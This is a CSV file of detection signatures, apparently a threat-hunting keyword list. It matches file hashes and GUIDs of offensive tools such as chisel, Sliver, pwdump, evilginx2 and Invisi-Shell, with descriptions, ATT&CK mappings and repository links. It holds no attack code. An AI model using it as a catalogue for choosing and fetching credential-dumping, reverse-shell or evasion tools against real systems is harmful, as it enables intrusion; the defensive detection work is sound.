"*4665bf3f84b00ec83f005ea4feb3617acf032a69826013656a04683865c204f6*",".{0,1000}4665bf3f84b00ec83f005ea4feb3617acf032a69826013656a04683865c204f6.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/knavesec/CredMaster","1","0","file_hash","9","9","874","109","2024-04-26T19:03:31Z","2020-09-25T20:57:42Z" 
"*4672ac01c62257129756f1d9f0ae1fd2471de6f78e47fa906af47e22204d917b*",".{0,1000}4672ac01c62257129756f1d9f0ae1fd2471de6f78e47fa906af47e22204d917b.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*4681186a8bcaff98f0d2513d30add67345491b95f7f743883e6ca2506ba7aaaf*",".{0,1000}4681186a8bcaff98f0d2513d30add67345491b95f7f743883e6ca2506ba7aaaf.{0,1000}","offensive_tool_keyword","linikatz","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tools","https://github.com/CiscoCXSecurity/linikatz","1","0","N/A","10","5","493","75","2023-10-19T17:01:47Z","2018-11-15T22:19:47Z" "*469796062be14876fd4a7f37c4cab22bac6ccee6a9c3e90c696b5901fe22f13a*",".{0,1000}469796062be14876fd4a7f37c4cab22bac6ccee6a9c3e90c696b5901fe22f13a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*46c816bb93ab1d318a84b7295969a7b9d2b8a728f5a6af52126119cc74d26d0a*",".{0,1000}46c816bb93ab1d318a84b7295969a7b9d2b8a728f5a6af52126119cc74d26d0a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*46c81a0250992cc04c2ee1ce3253fd4629e6ae25da1cecdbfe0427b5aa3157c4*",".{0,1000}46c81a0250992cc04c2ee1ce3253fd4629e6ae25da1cecdbfe0427b5aa3157c4.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","0","N/A","10","10","859","144","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z" "*46d1f15077f064a99b06bb115ba498581828ff8b712b2c41f6eb602538077035*",".{0,1000}46d1f15077f064a99b06bb115ba498581828ff8b712b2c41f6eb602538077035.{0,1000}","offensive_tool_keyword","ADFSDump","A C# tool to dump all sorts of goodies from AD FS","T1081 - T1003 - T1114 - T1212","TA0006 - TA0005 - TA0009","N/A","N/A","Credential Access","https://github.com/mandiant/ADFSDump","1","0","N/A","10","3","287","63","2023-08-07T16:58:37Z","2019-03-20T22:31:16Z" "*46db2ff1d405f57e52377c5e42b9918d7b00c47ea75a5a77352dacd1d8d0c97a*",".{0,1000}46db2ff1d405f57e52377c5e42b9918d7b00c47ea75a5a77352dacd1d8d0c97a.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" 
"*46f31a5656b5592c4b37514bf7726bb1d51140b7eab918643a931cd269289b19*",".{0,1000}46f31a5656b5592c4b37514bf7726bb1d51140b7eab918643a931cd269289b19.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline separated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","N/A","10","10","1922","376","2024-04-30T13:32:24Z","2017-04-05T17:05:10Z" "*46f917a6a3de5d2b29fd77a842015ac27e6e3ba2faa92395c27666b2721dcaa0*",".{0,1000}46f917a6a3de5d2b29fd77a842015ac27e6e3ba2faa92395c27666b2721dcaa0.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*46fd93a2992e8e9a29740d3d116d6d802315e51753f667cd3e462845ddea663c*",".{0,1000}46fd93a2992e8e9a29740d3d116d6d802315e51753f667cd3e462845ddea663c.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*470150f91aebe1fd59949728f99b2bb847cf8d1867ca2ee767fef9b7c44e206d*",".{0,1000}470150f91aebe1fd59949728f99b2bb847cf8d1867ca2ee767fef9b7c44e206d.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 
","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","N/A","10","10","875","126","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z" "*47164ef76a78406a70ee1b88ae4e31230ace7ee2ba6c3a56b0b9771b75e14fff*",".{0,1000}47164ef76a78406a70ee1b88ae4e31230ace7ee2ba6c3a56b0b9771b75e14fff.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*4747b86b7a8d2ba61f377e2526d6f2764cb8146be5dd8d6ad42af745dd705c8b*",".{0,1000}4747b86b7a8d2ba61f377e2526d6f2764cb8146be5dd8d6ad42af745dd705c8b.{0,1000}","offensive_tool_keyword","pwdump","a tool used within a command-line interface on 64bit Windows computers to extract the NTLM (LanMan) hashes from LSASS.exe in memory. 
This tool may be used in conjunction with malware or other penetration testing tools to obtain credentials for use in Windows authentication systems","T1003 - T1110.001 - T1555.003","TA0006","N/A","N/A","Credential Access","https://ftp.samba.org/pub/samba/pwdump/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*474B99B7-66C4-4AC2-8AD3-065DD13DDDFF*",".{0,1000}474B99B7\-66C4\-4AC2\-8AD3\-065DD13DDDFF.{0,1000}","offensive_tool_keyword","WebSocketReverseShellDotNet","A .NET-based Reverse Shell, it establishes a link to the command and control for subsequent guidance.","T1071 - T1105","TA0011 - TA0002","N/A","N/A","C2","https://github.com/The-Hustler-Hattab/WebSocketReverseShellDotNet","1","0","N/A","10","10","1","0","2024-04-18T01:00:48Z","2023-12-03T03:35:24Z" "*476FC126-239F-4D58-8389-E1C0E93C2C5E*",".{0,1000}476FC126\-239F\-4D58\-8389\-E1C0E93C2C5E.{0,1000}","offensive_tool_keyword","NativeDump","Dump lsass using only Native APIs by hand-crafting Minidump files (without MinidumpWriteDump!)","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/ricardojoserf/NativeDump","1","0","N/A","10","3","223","31","2024-04-27T15:37:50Z","2024-02-22T15:16:16Z" "*4781b10d0dae27a772518c9167b3a654c46017897bc73ce4540f4bfca33e9b58*",".{0,1000}4781b10d0dae27a772518c9167b3a654c46017897bc73ce4540f4bfca33e9b58.{0,1000}","offensive_tool_keyword","NLBrute","RDP Bruteforcer","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/amazond/NLBrute-1.2","1","0","N/A","10","1","0","1","2023-12-21T12:25:54Z","2023-12-21T12:22:27Z" "*47ab8ed046a22fb188930af037aa05a7f74e3e39331d56c32d736589f7ac78b2*",".{0,1000}47ab8ed046a22fb188930af037aa05a7f74e3e39331d56c32d736589f7ac78b2.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*47eb5cfc14028872dab22f2202be7f5df00288463ca798191286ddb99bf7b34f*",".{0,1000}47eb5cfc14028872dab22f2202be7f5df00288463ca798191286ddb99bf7b34f.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*47f65f47bf82b419bd5cc4ef4dc6d538cad4e5006aad4c557d242e31ab492ba4*",".{0,1000}47f65f47bf82b419bd5cc4ef4dc6d538cad4e5006aad4c557d242e31ab492ba4.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*47fcecd53c11bc648d564c02592617a6ce400d59c94167eefc9a5f7d86cb645c*",".{0,1000}47fcecd53c11bc648d564c02592617a6ce400d59c94167eefc9a5f7d86cb645c.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the 
fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*482002c785db1a3432ec214464a19042a3f36a21e5617a9901a0eae9f04451f1*",".{0,1000}482002c785db1a3432ec214464a19042a3f36a21e5617a9901a0eae9f04451f1.{0,1000}","offensive_tool_keyword","CelestialSpark","A modern 64-bit position independent meterpreter and Sliver compatible reverse_TCP Staging Shellcode based on Cracked5piders Stardust","T1572 - T1048 - T1041 - T1105","TA0005 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/Karkas66/CelestialSpark","1","0","N/A","10","10","53","6","2024-04-11T13:10:32Z","2024-04-11T12:17:22Z" "*482882bd61c051edd33a9b31d03430d6090bcf031102779c66c7adfc1790d7ee*",".{0,1000}482882bd61c051edd33a9b31d03430d6090bcf031102779c66c7adfc1790d7ee.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*48356997a701c96f9b96b1d2dfc20280771a112f2d03b0266abb12e24562456c*",".{0,1000}48356997a701c96f9b96b1d2dfc20280771a112f2d03b0266abb12e24562456c.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*48359bfb6692ea45f075188b2b244fc8fcec4ef7e80d2c2eecae90d5c9cdd04b*",".{0,1000}48359bfb6692ea45f075188b2b244fc8fcec4ef7e80d2c2eecae90d5c9cdd04b.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*486d59732d2c346aa2cbaffff0d290b0e5fc0a967e0878240fd29df65525dfc8*",".{0,1000}486d59732d2c346aa2cbaffff0d290b0e5fc0a967e0878240fd29df65525dfc8.{0,1000}","offensive_tool_keyword","Offensive-Netsh-Helper","Maintain Windows Persistence with an evil Netshell Helper DLL","T1174 - T1055.011 - T1546.013 - T1574.002 - T1105","TA0003 ","N/A","N/A","Persistence","https://github.com/rtcrowley/Offensive-Netsh-Helper","1","0","N/A","9","1","12","5","2018-07-28T02:12:09Z","2018-07-25T22:49:20Z" "*4870b4163315fa666dea8be03176d76aa215fe33187db45aca984e07b25ca827*",".{0,1000}4870b4163315fa666dea8be03176d76aa215fe33187db45aca984e07b25ca827.{0,1000}","offensive_tool_keyword","PILOT","Pilot is a simplified system designed for the stealthy 
transfer of files across networks using ICMP","T1048.001 - T1573.001 - T1020","TA0010 - TA0002 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/dahvidschloss/PILOT","1","0","N/A","9","1","60","4","2024-04-16T18:24:44Z","2024-04-03T15:04:33Z" "*48736ecb605040b194fb7064d4bb621c38713fd3555a4f09f759ee45e81a2103*",".{0,1000}48736ecb605040b194fb7064d4bb621c38713fd3555a4f09f759ee45e81a2103.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*4876fe3093df0f61892c691ecdf0db052d77c461fac698b50d1fd48e927bd2e9*",".{0,1000}4876fe3093df0f61892c691ecdf0db052d77c461fac698b50d1fd48e927bd2e9.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*48a7ca531d14b205dfcaaa59b86e78f3f092a2c1c6ccf8c827ee87ba30d3108c*",".{0,1000}48a7ca531d14b205dfcaaa59b86e78f3f092a2c1c6ccf8c827ee87ba30d3108c.{0,1000}","offensive_tool_keyword","pamspy","Credentials Dumper for Linux using eBPF","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/citronneur/pamspy","1","0","N/A","10","10","N/A","N/A","N/A","N/A" 
"*48ca254a725d1c4b6422cde2faa8777559f1513bc9bc032f05ee433be8b5fc55*",".{0,1000}48ca254a725d1c4b6422cde2faa8777559f1513bc9bc032f05ee433be8b5fc55.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*48caf6ffe4985e7541b9d34e8b6946d8c99e9d87cb46d146c81029fa280c03ba*",".{0,1000}48caf6ffe4985e7541b9d34e8b6946d8c99e9d87cb46d146c81029fa280c03ba.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*48f877f4424e0357e506fb65e0b673e495a092c3e1a2b0a010451defbb46c817*",".{0,1000}48f877f4424e0357e506fb65e0b673e495a092c3e1a2b0a010451defbb46c817.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*491012428e225b620985e8fc2af087fe8b85ccd9c9cc0a37bd1385b62f317bbe*",".{0,1000}491012428e225b620985e8fc2af087fe8b85ccd9c9cc0a37bd1385b62f317bbe.{0,1000}","offensive_tool_keyword","Koppeling","Adaptive DLL hijacking / dynamic export forwarding","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/monoxgas/Koppeling","1","0","N/A","8","7","686","119","2020-07-06T14:47:57Z","2020-02-18T21:08:16Z" "*494072da9b54381c4b40e55e6131db414797d450b562a67c45168fb3bb46a07c*",".{0,1000}494072da9b54381c4b40e55e6131db414797d450b562a67c45168fb3bb46a07c.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*4955d7e8fc3d3ded8e3b95757c78b3c4cd969b5fbb92a65267e6141b8faa83d5*",".{0,1000}4955d7e8fc3d3ded8e3b95757c78b3c4cd969b5fbb92a65267e6141b8faa83d5.{0,1000}","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/Mr-xn/BurpSuite-collections","1","0","N/A","N/A","10","3044","627","2023-08-04T13:50:07Z","2020-01-25T02:07:37Z" "*4962402d7407375db7e69c2d731aec97649668214c27c82b46971733a902ac0b*",".{0,1000}4962402d7407375db7e69c2d731aec97649668214c27c82b46971733a902ac0b.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*497CA37F-506C-46CD-9B8D-F9BB0DA34B95*",".{0,1000}497CA37F\-506C\-46CD\-9B8D\-F9BB0DA34B95.{0,1000}","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","0","N/A","9","4","350","93","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" "*4984f4ee968fc246b4df6e9d6552753a98e4762c8cc95cd9693ffa815479d8f7*",".{0,1000}4984f4ee968fc246b4df6e9d6552753a98e4762c8cc95cd9693ffa815479d8f7.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*49cf02eb8f76329b62378b8e9b0ae5abbe0312b9f2c3e068dbdf57f9474dfd8c*",".{0,1000}49cf02eb8f76329b62378b8e9b0ae5abbe0312b9f2c3e068dbdf57f9474dfd8c.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*49df12075c49bb956291cd11b2c53626174b4128309ada438d5d5e49265866f9*",".{0,1000}49df12075c49bb956291cd11b2c53626174b4128309ada438d5d5e49265866f9.{0,1000}","offensive_tool_keyword","o365recon","script to retrieve information via O365 and AzureAD with a valid cred ","T1110 - T1081 - T1081.001 - T1114 - T1087","TA0006 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/o365recon","1","0","file_hash","7","7","657","98","2022-08-14T04:18:28Z","2017-09-02T17:19:42Z" "*4a4dbfa07c6f4a72b6727c4a2ed8ef2899f61f724a9b5d142ab30b1c283a6db8*",".{0,1000}4a4dbfa07c6f4a72b6727c4a2ed8ef2899f61f724a9b5d142ab30b1c283a6db8.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" 
"*4a8e184ca9e1ccc775b224a48d344ce13dde26a86a634df2853ce7a27c17765c*",".{0,1000}4a8e184ca9e1ccc775b224a48d344ce13dde26a86a634df2853ce7a27c17765c.{0,1000}","offensive_tool_keyword","Invisi-Shell","Hide your powershell script in plain sight! Invisi-Shell bypasses all of Powershell security features (ScriptBlock logging. Module logging. Transcription. AMSI) by hooking .Net assemblies. The hook is performed via CLR Profiler API.","T1027 - T1059.001 - T1562","TA0005 - TA0002?","N/A","N/A","Defense Evasion","https://github.com/OmerYa/Invisi-Shell","1","0","N/A","10","10","1024","151","2019-08-19T19:55:19Z","2018-10-14T23:32:56Z" "*4aa27ae37edfbfe57f3ab989d192caf21b3c871516958eb77205c9ad700c3f67*",".{0,1000}4aa27ae37edfbfe57f3ab989d192caf21b3c871516958eb77205c9ad700c3f67.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*4ab0e8086598b7691fd17afbfa4a1cd79b3a13a9001a791c15a9f30afd43d13e*",".{0,1000}4ab0e8086598b7691fd17afbfa4a1cd79b3a13a9001a791c15a9f30afd43d13e.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*4b1b36706c5306f0084713e926888ffbe0fe9bfbf1b0bdfeef950b6dc531cb18*",".{0,1000}4b1b36706c5306f0084713e926888ffbe0fe9bfbf1b0bdfeef950b6dc531cb18.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
